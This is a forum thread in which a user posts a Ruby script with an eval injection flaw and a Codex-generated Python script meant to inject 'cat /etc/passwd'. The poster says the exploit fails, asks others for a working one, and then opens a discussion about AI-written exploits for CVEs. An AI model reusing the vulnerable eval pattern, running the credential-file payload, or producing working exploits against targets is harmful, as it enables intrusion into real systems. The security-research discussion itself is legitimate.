OpenAI Codex and exploit development

Hello everyone,

So I had the idea to ask codex to generate a simple exploit for a vulnerable ruby script. Here’s what happened:

#!/usr/bin/ruby
# vulnerable.rb code:

puts "Calculating"
first_number  = ARGV[0]#.to_i
second_number = ARGV[1]#.to_i
print "Args:",first_number,second_number,"
"
print eval(first_number+"+"+second_number)

#!/usr/bin/env python3
# exploit.py code that runs vulnerable.rb and injects "cat /etc/passwd" command


import sys
import subprocess

# Run vulnerable.rb
proc = subprocess.Popen(["ruby", "vulnerable.rb"], stdout=subprocess.PIPE)


# Read the output of vulnerable.rb
output = proc.stdout.readline()

# Extract the first argument from the vulnerable.rb output
first_number = output.split()[1]

# Extract the second argument from the vulnerable.rb output
second_number = output.split()[3]

# Run the vulnerable.rb with the injected command
proc = subprocess.Popen(["ruby", "vulnerable.rb", first_number, second_number, "cat /etc/passwd"], stdout=subprocess.PIPE)

# Read the output of vulnerable.rb
output = proc.stdout.readline()

# Print the output of vulnerable.rb
print(output)

So obviously it failed, but it has some ideas, and maybe by tweaking the prompts one could generate working exploits (I’m still new to codex, so I don’t know, maybe better prompts would’ve worked?). If someone more experienced than me can create a working exploit let me know how.

So anyways, since my speciality is security, I’m thinking what the implications are of having an AI capable of generating working exploits given the vulnerable source code.

I think at this point in time Codex doesn’t understand CVEs yet, and when I tried asking it to write an exploit for a specific CVE, it failed. Will this change in the future? Would it be possible to create arbitrary exploits if you ask it “create a python file that’ll try CVE-XXXX-XXXX and CVE-YYYY-YYYY on target ZZZZ”? What would the implications of that be on the security of the Internet?

I don’t have any clear questions, and all of this is still fuzzy to me, which is why I wanted to start the discussion around IT security in this forum.

3 Likes

Thanks @m-a.schenk, I checked the paper and it’s a little clearer now, however I still think more research is needed and the short section in the paper doesn’t really cover enough possible risks. Is anyone already working on some kind of security assesment of the model?

1 Like

I’m also combining cybersecurity research with machine learning. Feel free to DM and maybe we can work on something together. If you read the Codex Release Research Paper, they address the security aspect in Appendix G.